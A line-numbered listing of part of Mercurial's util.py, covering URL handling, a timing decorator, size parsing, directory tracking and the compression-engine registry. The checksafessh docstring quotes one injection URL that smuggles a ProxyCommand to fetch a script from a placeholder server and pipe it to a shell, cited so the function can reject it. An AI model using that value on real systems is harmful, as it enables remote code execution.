3102 if self.scheme == 'file' or self.scheme == 'bundle':
3101 if self.scheme == 'file' or self.scheme == 'bundle':
3103 path = self.path or '/'
3102 path = self.path or '/'
3104 # For Windows, we need to promote hosts containing drive
3103 # For Windows, we need to promote hosts containing drive
3105 # letters to paths with drive letters.
3104 # letters to paths with drive letters.
3106 if hasdriveletter(self._hostport):
3105 if hasdriveletter(self._hostport):
3107 path = self._hostport + '/' + self.path
3106 path = self._hostport + '/' + self.path
3108 elif (self.host is not None and self.path
3107 elif (self.host is not None and self.path
3109 and not hasdriveletter(path)):
3108 and not hasdriveletter(path)):
3110 path = '/' + path
3109 path = '/' + path
3111 return path
3110 return path
3112 return self._origpath
3111 return self._origpath
3113
3112
3114 def islocal(self):
3113 def islocal(self):
3115 '''whether localpath will return something that posixfile can open'''
3114 '''whether localpath will return something that posixfile can open'''
3116 return (not self.scheme or self.scheme == 'file'
3115 return (not self.scheme or self.scheme == 'file'
3117 or self.scheme == 'bundle')
3116 or self.scheme == 'bundle')
3118
3117
3119 def hasscheme(path):
3118 def hasscheme(path):
3120 return bool(url(path).scheme)
3119 return bool(url(path).scheme)
3121
3120
3122 def hasdriveletter(path):
3121 def hasdriveletter(path):
3123 return path and path[1:2] == ':' and path[0:1].isalpha()
3122 return path and path[1:2] == ':' and path[0:1].isalpha()
3124
3123
3125 def urllocalpath(path):
3124 def urllocalpath(path):
3126 return url(path, parsequery=False, parsefragment=False).localpath()
3125 return url(path, parsequery=False, parsefragment=False).localpath()
3127
3126
3128 def checksafessh(path):
3127 def checksafessh(path):
3129 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3128 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3130
3129
3131 This is a sanity check for ssh urls. ssh will parse the first item as
3130 This is a sanity check for ssh urls. ssh will parse the first item as
3132 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3131 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3133 Let's prevent these potentially exploited urls entirely and warn the
3132 Let's prevent these potentially exploited urls entirely and warn the
3134 user.
3133 user.
3135
3134
3136 Raises an error.Abort when the url is unsafe.
3135 Raises an error.Abort when the url is unsafe.
3137 """
3136 """
3138 path = urlreq.unquote(path)
3137 path = urlreq.unquote(path)
3139 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3138 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3140 raise error.Abort(_('potentially unsafe url: %r') %
3139 raise error.Abort(_('potentially unsafe url: %r') %
3141 (pycompat.bytestr(path),))
3140 (pycompat.bytestr(path),))
3142
3141
3143 def hidepassword(u):
3142 def hidepassword(u):
3144 '''hide user credential in a url string'''
3143 '''hide user credential in a url string'''
3145 u = url(u)
3144 u = url(u)
3146 if u.passwd:
3145 if u.passwd:
3147 u.passwd = '***'
3146 u.passwd = '***'
3148 return bytes(u)
3147 return bytes(u)
3149
3148
3150 def removeauth(u):
3149 def removeauth(u):
3151 '''remove all authentication information from a url string'''
3150 '''remove all authentication information from a url string'''
3152 u = url(u)
3151 u = url(u)
3153 u.user = u.passwd = None
3152 u.user = u.passwd = None
3154 return str(u)
3153 return str(u)
3155
3154
3156 timecount = unitcountfn(
3155 timecount = unitcountfn(
3157 (1, 1e3, _('%.0f s')),
3156 (1, 1e3, _('%.0f s')),
3158 (100, 1, _('%.1f s')),
3157 (100, 1, _('%.1f s')),
3159 (10, 1, _('%.2f s')),
3158 (10, 1, _('%.2f s')),
3160 (1, 1, _('%.3f s')),
3159 (1, 1, _('%.3f s')),
3161 (100, 0.001, _('%.1f ms')),
3160 (100, 0.001, _('%.1f ms')),
3162 (10, 0.001, _('%.2f ms')),
3161 (10, 0.001, _('%.2f ms')),
3163 (1, 0.001, _('%.3f ms')),
3162 (1, 0.001, _('%.3f ms')),
3164 (100, 0.000001, _('%.1f us')),
3163 (100, 0.000001, _('%.1f us')),
3165 (10, 0.000001, _('%.2f us')),
3164 (10, 0.000001, _('%.2f us')),
3166 (1, 0.000001, _('%.3f us')),
3165 (1, 0.000001, _('%.3f us')),
3167 (100, 0.000000001, _('%.1f ns')),
3166 (100, 0.000000001, _('%.1f ns')),
3168 (10, 0.000000001, _('%.2f ns')),
3167 (10, 0.000000001, _('%.2f ns')),
3169 (1, 0.000000001, _('%.3f ns')),
3168 (1, 0.000000001, _('%.3f ns')),
3170 )
3169 )
3171
3170
3172 _timenesting = [0]
3171 _timenesting = [0]
3173
3172
3174 def timed(func):
3173 def timed(func):
3175 '''Report the execution time of a function call to stderr.
3174 '''Report the execution time of a function call to stderr.
3176
3175
3177 During development, use as a decorator when you need to measure
3176 During development, use as a decorator when you need to measure
3178 the cost of a function, e.g. as follows:
3177 the cost of a function, e.g. as follows:
3179
3178
3180 @util.timed
3179 @util.timed
3181 def foo(a, b, c):
3180 def foo(a, b, c):
3182 pass
3181 pass
3183 '''
3182 '''
3184
3183
3185 def wrapper(*args, **kwargs):
3184 def wrapper(*args, **kwargs):
3186 start = timer()
3185 start = timer()
3187 indent = 2
3186 indent = 2
3188 _timenesting[0] += indent
3187 _timenesting[0] += indent
3189 try:
3188 try:
3190 return func(*args, **kwargs)
3189 return func(*args, **kwargs)
3191 finally:
3190 finally:
3192 elapsed = timer() - start
3191 elapsed = timer() - start
3193 _timenesting[0] -= indent
3192 _timenesting[0] -= indent
3194 stderr.write('%s%s: %s\n' %
3193 stderr.write('%s%s: %s\n' %
3195 (' ' * _timenesting[0], func.__name__,
3194 (' ' * _timenesting[0], func.__name__,
3196 timecount(elapsed)))
3195 timecount(elapsed)))
3197 return wrapper
3196 return wrapper
3198
3197
3199 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3198 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3200 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3199 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3201
3200
3202 def sizetoint(s):
3201 def sizetoint(s):
3203 '''Convert a space specifier to a byte count.
3202 '''Convert a space specifier to a byte count.
3204
3203
3205 >>> sizetoint(b'30')
3204 >>> sizetoint(b'30')
3206 30
3205 30
3207 >>> sizetoint(b'2.2kb')
3206 >>> sizetoint(b'2.2kb')
3208 2252
3207 2252
3209 >>> sizetoint(b'6M')
3208 >>> sizetoint(b'6M')
3210 6291456
3209 6291456
3211 '''
3210 '''
3212 t = s.strip().lower()
3211 t = s.strip().lower()
3213 try:
3212 try:
3214 for k, u in _sizeunits:
3213 for k, u in _sizeunits:
3215 if t.endswith(k):
3214 if t.endswith(k):
3216 return int(float(t[:-len(k)]) * u)
3215 return int(float(t[:-len(k)]) * u)
3217 return int(t)
3216 return int(t)
3218 except ValueError:
3217 except ValueError:
3219 raise error.ParseError(_("couldn't parse size: %s") % s)
3218 raise error.ParseError(_("couldn't parse size: %s") % s)
3220
3219
3221 class hooks(object):
3220 class hooks(object):
3222 '''A collection of hook functions that can be used to extend a
3221 '''A collection of hook functions that can be used to extend a
3223 function's behavior. Hooks are called in lexicographic order,
3222 function's behavior. Hooks are called in lexicographic order,
3224 based on the names of their sources.'''
3223 based on the names of their sources.'''
3225
3224
3226 def __init__(self):
3225 def __init__(self):
3227 self._hooks = []
3226 self._hooks = []
3228
3227
3229 def add(self, source, hook):
3228 def add(self, source, hook):
3230 self._hooks.append((source, hook))
3229 self._hooks.append((source, hook))
3231
3230
3232 def __call__(self, *args):
3231 def __call__(self, *args):
3233 self._hooks.sort(key=lambda x: x[0])
3232 self._hooks.sort(key=lambda x: x[0])
3234 results = []
3233 results = []
3235 for source, hook in self._hooks:
3234 for source, hook in self._hooks:
3236 results.append(hook(*args))
3235 results.append(hook(*args))
3237 return results
3236 return results
3238
3237
3239 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3238 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3240 '''Yields lines for a nicely formatted stacktrace.
3239 '''Yields lines for a nicely formatted stacktrace.
3241 Skips the 'skip' last entries, then return the last 'depth' entries.
3240 Skips the 'skip' last entries, then return the last 'depth' entries.
3242 Each file+linenumber is formatted according to fileline.
3241 Each file+linenumber is formatted according to fileline.
3243 Each line is formatted according to line.
3242 Each line is formatted according to line.
3244 If line is None, it yields:
3243 If line is None, it yields:
3245 length of longest filepath+line number,
3244 length of longest filepath+line number,
3246 filepath+linenumber,
3245 filepath+linenumber,
3247 function
3246 function
3248
3247
3249 Not be used in production code but very convenient while developing.
3248 Not be used in production code but very convenient while developing.
3250 '''
3249 '''
3251 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3250 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3252 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3251 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3253 ][-depth:]
3252 ][-depth:]
3254 if entries:
3253 if entries:
3255 fnmax = max(len(entry[0]) for entry in entries)
3254 fnmax = max(len(entry[0]) for entry in entries)
3256 for fnln, func in entries:
3255 for fnln, func in entries:
3257 if line is None:
3256 if line is None:
3258 yield (fnmax, fnln, func)
3257 yield (fnmax, fnln, func)
3259 else:
3258 else:
3260 yield line % (fnmax, fnln, func)
3259 yield line % (fnmax, fnln, func)
3261
3260
3262 def debugstacktrace(msg='stacktrace', skip=0,
3261 def debugstacktrace(msg='stacktrace', skip=0,
3263 f=stderr, otherf=stdout, depth=0):
3262 f=stderr, otherf=stdout, depth=0):
3264 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3263 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3265 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3264 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3266 By default it will flush stdout first.
3265 By default it will flush stdout first.
3267 It can be used everywhere and intentionally does not require an ui object.
3266 It can be used everywhere and intentionally does not require an ui object.
3268 Not be used in production code but very convenient while developing.
3267 Not be used in production code but very convenient while developing.
3269 '''
3268 '''
3270 if otherf:
3269 if otherf:
3271 otherf.flush()
3270 otherf.flush()
3272 f.write('%s at:\n' % msg.rstrip())
3271 f.write('%s at:\n' % msg.rstrip())
3273 for line in getstackframes(skip + 1, depth=depth):
3272 for line in getstackframes(skip + 1, depth=depth):
3274 f.write(line)
3273 f.write(line)
3275 f.flush()
3274 f.flush()
3276
3275
3277 class dirs(object):
3276 class dirs(object):
3278 '''a multiset of directory names from a dirstate or manifest'''
3277 '''a multiset of directory names from a dirstate or manifest'''
3279
3278
3280 def __init__(self, map, skip=None):
3279 def __init__(self, map, skip=None):
3281 self._dirs = {}
3280 self._dirs = {}
3282 addpath = self.addpath
3281 addpath = self.addpath
3283 if safehasattr(map, 'iteritems') and skip is not None:
3282 if safehasattr(map, 'iteritems') and skip is not None:
3284 for f, s in map.iteritems():
3283 for f, s in map.iteritems():
3285 if s[0] != skip:
3284 if s[0] != skip:
3286 addpath(f)
3285 addpath(f)
3287 else:
3286 else:
3288 for f in map:
3287 for f in map:
3289 addpath(f)
3288 addpath(f)
3290
3289
3291 def addpath(self, path):
3290 def addpath(self, path):
3292 dirs = self._dirs
3291 dirs = self._dirs
3293 for base in finddirs(path):
3292 for base in finddirs(path):
3294 if base in dirs:
3293 if base in dirs:
3295 dirs[base] += 1
3294 dirs[base] += 1
3296 return
3295 return
3297 dirs[base] = 1
3296 dirs[base] = 1
3298
3297
3299 def delpath(self, path):
3298 def delpath(self, path):
3300 dirs = self._dirs
3299 dirs = self._dirs
3301 for base in finddirs(path):
3300 for base in finddirs(path):
3302 if dirs[base] > 1:
3301 if dirs[base] > 1:
3303 dirs[base] -= 1
3302 dirs[base] -= 1
3304 return
3303 return
3305 del dirs[base]
3304 del dirs[base]
3306
3305
3307 def __iter__(self):
3306 def __iter__(self):
3308 return iter(self._dirs)
3307 return iter(self._dirs)
3309
3308
3310 def __contains__(self, d):
3309 def __contains__(self, d):
3311 return d in self._dirs
3310 return d in self._dirs
3312
3311
3313 if safehasattr(parsers, 'dirs'):
3312 if safehasattr(parsers, 'dirs'):
3314 dirs = parsers.dirs
3313 dirs = parsers.dirs
3315
3314
3316 def finddirs(path):
3315 def finddirs(path):
3317 pos = path.rfind('/')
3316 pos = path.rfind('/')
3318 while pos != -1:
3317 while pos != -1:
3319 yield path[:pos]
3318 yield path[:pos]
3320 pos = path.rfind('/', 0, pos)
3319 pos = path.rfind('/', 0, pos)
3321
3320
3322 # compression code
3321 # compression code
3323
3322
3324 SERVERROLE = 'server'
3323 SERVERROLE = 'server'
3325 CLIENTROLE = 'client'
3324 CLIENTROLE = 'client'
3326
3325
3327 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3326 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3328 (u'name', u'serverpriority',
3327 (u'name', u'serverpriority',
3329 u'clientpriority'))
3328 u'clientpriority'))
3330
3329
3331 class compressormanager(object):
3330 class compressormanager(object):
3332 """Holds registrations of various compression engines.
3331 """Holds registrations of various compression engines.
3333
3332
3334 This class essentially abstracts the differences between compression
3333 This class essentially abstracts the differences between compression
3335 engines to allow new compression formats to be added easily, possibly from
3334 engines to allow new compression formats to be added easily, possibly from
3336 extensions.
3335 extensions.
3337
3336
3338 Compressors are registered against the global instance by calling its
3337 Compressors are registered against the global instance by calling its
3339 ``register()`` method.
3338 ``register()`` method.
3340 """
3339 """
3341 def __init__(self):
3340 def __init__(self):
3342 self._engines = {}
3341 self._engines = {}
3343 # Bundle spec human name to engine name.
3342 # Bundle spec human name to engine name.
3344 self._bundlenames = {}
3343 self._bundlenames = {}
3345 # Internal bundle identifier to engine name.
3344 # Internal bundle identifier to engine name.
3346 self._bundletypes = {}
3345 self._bundletypes = {}
3347 # Revlog header to engine name.
3346 # Revlog header to engine name.
3348 self._revlogheaders = {}
3347 self._revlogheaders = {}
3349 # Wire proto identifier to engine name.
3348 # Wire proto identifier to engine name.
3350 self._wiretypes = {}
3349 self._wiretypes = {}
3351
3350
3352 def __getitem__(self, key):
3351 def __getitem__(self, key):
3353 return self._engines[key]
3352 return self._engines[key]
3354
3353
3355 def __contains__(self, key):
3354 def __contains__(self, key):
3356 return key in self._engines
3355 return key in self._engines
3357
3356
3358 def __iter__(self):
3357 def __iter__(self):
3359 return iter(self._engines.keys())
3358 return iter(self._engines.keys())
3360
3359
3361 def register(self, engine):
3360 def register(self, engine):
3362 """Register a compression engine with the manager.
3361 """Register a compression engine with the manager.
3363
3362
3364 The argument must be a ``compressionengine`` instance.
3363 The argument must be a ``compressionengine`` instance.
3365 """
3364 """
3366 if not isinstance(engine, compressionengine):
3365 if not isinstance(engine, compressionengine):
3367 raise ValueError(_('argument must be a compressionengine'))
3366 raise ValueError(_('argument must be a compressionengine'))
3368
3367
3369 name = engine.name()
3368 name = engine.name()
3370
3369
3371 if name in self._engines:
3370 if name in self._engines:
3372 raise error.Abort(_('compression engine %s already registered') %
3371 raise error.Abort(_('compression engine %s already registered') %
3373 name)
3372 name)
3374
3373
3375 bundleinfo = engine.bundletype()
3374 bundleinfo = engine.bundletype()
3376 if bundleinfo:
3375 if bundleinfo:
3377 bundlename, bundletype = bundleinfo
3376 bundlename, bundletype = bundleinfo
3378
3377
3379 if bundlename in self._bundlenames:
3378 if bundlename in self._bundlenames:
3380 raise error.Abort(_('bundle name %s already registered') %
3379 raise error.Abort(_('bundle name %s already registered') %
3381 bundlename)
3380 bundlename)
3382 if bundletype in self._bundletypes:
3381 if bundletype in self._bundletypes:
3383 raise error.Abort(_('bundle type %s already registered by %s') %
3382 raise error.Abort(_('bundle type %s already registered by %s') %
3384 (bundletype, self._bundletypes[bundletype]))
3383 (bundletype, self._bundletypes[bundletype]))
3385
3384
3386 # No external facing name declared.
3385 # No external facing name declared.
3387 if bundlename:
3386 if bundlename:
3388 self._bundlenames[bundlename] = name
3387 self._bundlenames[bundlename] = name
3389
3388
3390 self._bundletypes[bundletype] = name
3389 self._bundletypes[bundletype] = name
3391
3390
3392 wiresupport = engine.wireprotosupport()
3391 wiresupport = engine.wireprotosupport()
3393 if wiresupport:
3392 if wiresupport:
3394 wiretype = wiresupport.name
3393 wiretype = wiresupport.name
3395 if wiretype in self._wiretypes:
3394 if wiretype in self._wiretypes:
3396 raise error.Abort(_('wire protocol compression %s already '
3395 raise error.Abort(_('wire protocol compression %s already '
3397 'registered by %s') %
3396 'registered by %s') %
3398 (wiretype, self._wiretypes[wiretype]))
3397 (wiretype, self._wiretypes[wiretype]))
3399
3398
3400 self._wiretypes[wiretype] = name
3399 self._wiretypes[wiretype] = name
3401
3400
3402 revlogheader = engine.revlogheader()
3401 revlogheader = engine.revlogheader()
3403 if revlogheader and revlogheader in self._revlogheaders:
3402 if revlogheader and revlogheader in self._revlogheaders:
3404 raise error.Abort(_('revlog header %s already registered by %s') %
3403 raise error.Abort(_('revlog header %s already registered by %s') %
3405 (revlogheader, self._revlogheaders[revlogheader]))
3404 (revlogheader, self._revlogheaders[revlogheader]))
3406
3405
3407 if revlogheader:
3406 if revlogheader:
3408 self._revlogheaders[revlogheader] = name
3407 self._revlogheaders[revlogheader] = name
3409
3408
3410 self._engines[name] = engine
3409 self._engines[name] = engine
3411
3410
3412 @property
3411 @property
3413 def supportedbundlenames(self):
3412 def supportedbundlenames(self):
3414 return set(self._bundlenames.keys())
3413 return set(self._bundlenames.keys())
3415
3414
3416 @property
3415 @property
3417 def supportedbundletypes(self):
3416 def supportedbundletypes(self):
3418 return set(self._bundletypes.keys())
3417 return set(self._bundletypes.keys())
3419
3418
3420 def forbundlename(self, bundlename):
3419 def forbundlename(self, bundlename):
3421 """Obtain a compression engine registered to a bundle name.
3420 """Obtain a compression engine registered to a bundle name.
3422
3421
3423 Will raise KeyError if the bundle type isn't registered.
3422 Will raise KeyError if the bundle type isn't registered.
3424
3423
3425 Will abort if the engine is known but not available.
3424 Will abort if the engine is known but not available.
3426 """
3425 """
3427 engine = self._engines[self._bundlenames[bundlename]]
3426 engine = self._engines[self._bundlenames[bundlename]]
3428 if not engine.available():
3427 if not engine.available():
3429 raise error.Abort(_('compression engine %s could not be loaded') %
3428 raise error.Abort(_('compression engine %s could not be loaded') %
3430 engine.name())
3429 engine.name())
3431 return engine
3430 return engine
3432
3431
3433 def forbundletype(self, bundletype):
3432 def forbundletype(self, bundletype):
3434 """Obtain a compression engine registered to a bundle type.
3433 """Obtain a compression engine registered to a bundle type.
3435
3434
3436 Will raise KeyError if the bundle type isn't registered.
3435 Will raise KeyError if the bundle type isn't registered.
3437
3436
3438 Will abort if the engine is known but not available.
3437 Will abort if the engine is known but not available.
3439 """
3438 """
3440 engine = self._engines[self._bundletypes[bundletype]]
3439 engine = self._engines[self._bundletypes[bundletype]]
3441 if not engine.available():
3440 if not engine.available():
3442 raise error.Abort(_('compression engine %s could not be loaded') %
3441 raise error.Abort(_('compression engine %s could not be loaded') %
3443 engine.name())
3442 engine.name())
3444 return engine
3443 return engine
3445
3444
3446 def supportedwireengines(self, role, onlyavailable=True):
3445 def supportedwireengines(self, role, onlyavailable=True):
3447 """Obtain compression engines that support the wire protocol.
3446 """Obtain compression engines that support the wire protocol.
3448
3447
3449 Returns a list of engines in prioritized order, most desired first.
3448 Returns a list of engines in prioritized order, most desired first.
3450
3449
3451 If ``onlyavailable`` is set, filter out engines that can't be
3450 If ``onlyavailable`` is set, filter out engines that can't be
3452 loaded.
3451 loaded.
3453 """
3452 """
3454 assert role in (SERVERROLE, CLIENTROLE)
3453 assert role in (SERVERROLE, CLIENTROLE)
3455
3454
3456 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3455 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3457
3456
3458 engines = [self._engines[e] for e in self._wiretypes.values()]
3457 engines = [self._engines[e] for e in self._wiretypes.values()]
3459 if onlyavailable:
3458 if onlyavailable:
3460 engines = [e for e in engines if e.available()]
3459 engines = [e for e in engines if e.available()]
3461
3460
3462 def getkey(e):
3461 def getkey(e):
3463 # Sort first by priority, highest first. In case of tie, sort
3462 # Sort first by priority, highest first. In case of tie, sort
3464 # alphabetically. This is arbitrary, but ensures output is
3463 # alphabetically. This is arbitrary, but ensures output is
3465 # stable.
3464 # stable.
3466 w = e.wireprotosupport()
3465 w = e.wireprotosupport()
3467 return -1 * getattr(w, attr), w.name
3466 return -1 * getattr(w, attr), w.name
3468
3467
3469 return list(sorted(engines, key=getkey))
3468 return list(sorted(engines, key=getkey))
3470
3469
3471 def forwiretype(self, wiretype):
3470 def forwiretype(self, wiretype):
3472 engine = self._engines[self._wiretypes[wiretype]]
3471 engine = self._engines[self._wiretypes[wiretype]]
3473 if not engine.available():
3472 if not engine.available():
3474 raise error.Abort(_('compression engine %s could not be loaded') %
3473 raise error.Abort(_('compression engine %s could not be loaded') %
3475 engine.name())
3474 engine.name())
3476 return engine
3475 return engine
3477
3476
3478 def forrevlogheader(self, header):
3477 def forrevlogheader(self, header):
3479 """Obtain a compression engine registered to a revlog header.
3478 """Obtain a compression engine registered to a revlog header.
3480
3479
3481 Will raise KeyError if the revlog header value isn't registered.
3480 Will raise KeyError if the revlog header value isn't registered.
3482 """
3481 """
3483 return self._engines[self._revlogheaders[header]]
3482 return self._engines[self._revlogheaders[header]]
3484
3483
3485 compengines = compressormanager()
3484 compengines = compressormanager()
3486
3485
3487 class compressionengine(object):
3486 class compressionengine(object):
3488 """Base class for compression engines.
3487 """Base class for compression engines.
3489
3488
3490 Compression engines must implement the interface defined by this class.
3489 Compression engines must implement the interface defined by this class.
3491 """
3490 """
3492 def name(self):
3491 def name(self):
3493 """Returns the name of the compression engine.
3492 """Returns the name of the compression engine.
3494
3493
3495 This is the key the engine is registered under.
3494 This is the key the engine is registered under.
3496
3495
3497 This method must be implemented.
3496 This method must be implemented.
3498 """
3497 """
3499 raise NotImplementedError()
3498 raise NotImplementedError()
3500
3499
3501 def available(self):
3500 def available(self):
3502 """Whether the compression engine is available.
3501 """Whether the compression engine is available.
3503
3502
3504 The intent of this method is to allow optional compression engines
3503 The intent of this method is to allow optional compression engines
3505 that may not be available in all installations (such as engines relying
3504 that may not be available in all installations (such as engines relying
3506 on C extensions that may not be present).
3505 on C extensions that may not be present).
3507 """
3506 """
3508 return True
3507 return True
3509
3508
3510 def bundletype(self):
3509 def bundletype(self):
3511 """Describes bundle identifiers for this engine.
3510 """Describes bundle identifiers for this engine.
3512
3511
3513 If this compression engine isn't supported for bundles, returns None.
3512 If this compression engine isn't supported for bundles, returns None.
3514
3513
3515 If this engine can be used for bundles, returns a 2-tuple of strings of
3514 If this engine can be used for bundles, returns a 2-tuple of strings of
3516 the user-facing "bundle spec" compression name and an internal
3515 the user-facing "bundle spec" compression name and an internal
3517 identifier used to denote the compression format within bundles. To
3516 identifier used to denote the compression format within bundles. To
3518 exclude the name from external usage, set the first element to ``None``.
3517 exclude the name from external usage, set the first element to ``None``.
3519
3518
3520 If bundle compression is supported, the class must also implement
3519 If bundle compression is supported, the class must also implement
3521 ``compressstream`` and `decompressorreader``.
3520 ``compressstream`` and `decompressorreader``.
3522
3521
3523 The docstring of this method is used in the help system to tell users
3522 The docstring of this method is used in the help system to tell users
3524 about this engine.
3523 about this engine.
3525 """
3524 """
3526 return None
3525 return None
3527
3526
3528 def wireprotosupport(self):
3527 def wireprotosupport(self):
3529 """Declare support for this compression format on the wire protocol.
3528 """Declare support for this compression format on the wire protocol.
3530
3529
3531 If this compression engine isn't supported for compressing wire
3530 If this compression engine isn't supported for compressing wire
3532 protocol payloads, returns None.
3531 protocol payloads, returns None.
3533
3532
3534 Otherwise, returns ``compenginewireprotosupport`` with the following
3533 Otherwise, returns ``compenginewireprotosupport`` with the following
3535 fields:
3534 fields:
3536
3535
3537 * String format identifier
3536 * String format identifier
3538 * Integer priority for the server
3537 * Integer priority for the server
3539 * Integer priority for the client
3538 * Integer priority for the client
3540
3539
3541 The integer priorities are used to order the advertisement of format
3540 The integer priorities are used to order the advertisement of format
3542 support by server and client. The highest integer is advertised
3541 support by server and client. The highest integer is advertised
3543 first. Integers with non-positive values aren't advertised.
3542 first. Integers with non-positive values aren't advertised.
3544
3543
3545 The priority values are somewhat arbitrary and only used for default
3544 The priority values are somewhat arbitrary and only used for default
3546 ordering. The relative order can be changed via config options.
3545 ordering. The relative order can be changed via config options.
3547
3546
3548 If wire protocol compression is supported, the class must also implement
3547 If wire protocol compression is supported, the class must also implement
3549 ``compressstream`` and ``decompressorreader``.
3548 ``compressstream`` and ``decompressorreader``.
3550 """
3549 """
3551 return None
3550 return None
3552
3551
3553 def revlogheader(self):
3552 def revlogheader(self):
3554 """Header added to revlog chunks that identifies this engine.
3553 """Header added to revlog chunks that identifies this engine.
3555
3554
3556 If this engine can be used to compress revlogs, this method should
3555 If this engine can be used to compress revlogs, this method should
3557 return the bytes used to identify chunks compressed with this engine.
3556 return the bytes used to identify chunks compressed with this engine.
3558 Else, the method should return ``None`` to indicate it does not
3557 Else, the method should return ``None`` to indicate it does not
3559 participate in revlog compression.
3558 participate in revlog compression.
3560 """
3559 """
3561 return None
3560 return None
3562
3561
3563 def compressstream(self, it, opts=None):
3562 def compressstream(self, it, opts=None):
3564 """Compress an iterator of chunks.
3563 """Compress an iterator of chunks.
3565
3564
3566 The method receives an iterator (ideally a generator) of chunks of
3565 The method receives an iterator (ideally a generator) of chunks of
3567 bytes to be compressed. It returns an iterator (ideally a generator)
3566 bytes to be compressed. It returns an iterator (ideally a generator)
3568 of bytes of chunks representing the compressed output.
3567 of bytes of chunks representing the compressed output.
3569
3568
3570 Optionally accepts an argument defining how to perform compression.
3569 Optionally accepts an argument defining how to perform compression.
3571 Each engine treats this argument differently.
3570 Each engine treats this argument differently.
3572 """
3571 """
3573 raise NotImplementedError()
3572 raise NotImplementedError()
3574
3573
3575 def decompressorreader(self, fh):
3574 def decompressorreader(self, fh):
3576 """Perform decompression on a file object.
3575 """Perform decompression on a file object.
3577
3576
3578 Argument is an object with a ``read(size)`` method that returns
3577 Argument is an object with a ``read(size)`` method that returns
3579 compressed data. Return value is an object with a ``read(size)`` that
3578 compressed data. Return value is an object with a ``read(size)`` that
3580 returns uncompressed data.
3579 returns uncompressed data.
3581 """
3580 """
3582 raise NotImplementedError()
3581 raise NotImplementedError()
3583
3582
3584 def revlogcompressor(self, opts=None):
3583 def revlogcompressor(self, opts=None):
3585 """Obtain an object that can be used to compress revlog entries.
3584 """Obtain an object that can be used to compress revlog entries.
3586
3585
3587 The object has a ``compress(data)`` method that compresses binary
3586 The object has a ``compress(data)`` method that compresses binary
3588 data. This method returns compressed binary data or ``None`` if
3587 data. This method returns compressed binary data or ``None`` if
3589 the data could not be compressed (too small, not compressible, etc).
3588 the data could not be compressed (too small, not compressible, etc).
3590 The returned data should have a header uniquely identifying this
3589 The returned data should have a header uniquely identifying this
3591 compression format so decompression can be routed to this engine.
3590 compression format so decompression can be routed to this engine.
3592 This header should be identified by the ``revlogheader()`` return
3591 This header should be identified by the ``revlogheader()`` return
3593 value.
3592 value.
3594
3593
3595 The object has a ``decompress(data)`` method that decompresses
3594 The object has a ``decompress(data)`` method that decompresses
3596 data. The method will only be called if ``data`` begins with
3595 data. The method will only be called if ``data`` begins with
3597 ``revlogheader()``. The method should return the raw, uncompressed
3596 ``revlogheader()``. The method should return the raw, uncompressed
3598 data or raise a ``RevlogError``.
3597 data or raise a ``RevlogError``.
3599
3598
3600 The object is reusable but is not thread safe.
3599 The object is reusable but is not thread safe.
3601 """
3600 """
3602 raise NotImplementedError()
3601 raise NotImplementedError()
3603
3602
3604 class _zlibengine(compressionengine):
3603 class _zlibengine(compressionengine):
3605 def name(self):
3604 def name(self):
3606 return 'zlib'
3605 return 'zlib'
3607
3606
3608 def bundletype(self):
3607 def bundletype(self):
3609 """zlib compression using the DEFLATE algorithm.
3608 """zlib compression using the DEFLATE algorithm.
3610
3609
3611 All Mercurial clients should support this format. The compression
3610 All Mercurial clients should support this format. The compression
3612 algorithm strikes a reasonable balance between compression ratio
3611 algorithm strikes a reasonable balance between compression ratio
3613 and size.
3612 and size.
3614 """
3613 """
3615 return 'gzip', 'GZ'
3614 return 'gzip', 'GZ'
3616
3615
3617 def wireprotosupport(self):
3616 def wireprotosupport(self):
3618 return compewireprotosupport('zlib', 20, 20)
3617 return compewireprotosupport('zlib', 20, 20)
3619
3618
3620 def revlogheader(self):
3619 def revlogheader(self):
3621 return 'x'
3620 return 'x'
3622
3621
3623 def compressstream(self, it, opts=None):
3622 def compressstream(self, it, opts=None):
3624 opts = opts or {}
3623 opts = opts or {}
3625
3624
3626 z = zlib.compressobj(opts.get('level', -1))
3625 z = zlib.compressobj(opts.get('level', -1))
3627 for chunk in it:
3626 for chunk in it:
3628 data = z.compress(chunk)
3627 data = z.compress(chunk)
3629 # Not all calls to compress emit data. It is cheaper to inspect
3628 # Not all calls to compress emit data. It is cheaper to inspect
3630 # here than to feed empty chunks through generator.
3629 # here than to feed empty chunks through generator.
3631 if data:
3630 if data:
3632 yield data
3631 yield data
3633
3632
3634 yield z.flush()
3633 yield z.flush()
3635
3634
3636 def decompressorreader(self, fh):
3635 def decompressorreader(self, fh):
3637 def gen():
3636 def gen():
3638 d = zlib.decompressobj()
3637 d = zlib.decompressobj()
3639 for chunk in filechunkiter(fh):
3638 for chunk in filechunkiter(fh):
3640 while chunk:
3639 while chunk:
3641 # Limit output size to limit memory.
3640 # Limit output size to limit memory.
3642 yield d.decompress(chunk, 2 ** 18)
3641 yield d.decompress(chunk, 2 ** 18)
3643 chunk = d.unconsumed_tail
3642 chunk = d.unconsumed_tail
3644
3643
3645 return chunkbuffer(gen())
3644 return chunkbuffer(gen())
3646
3645
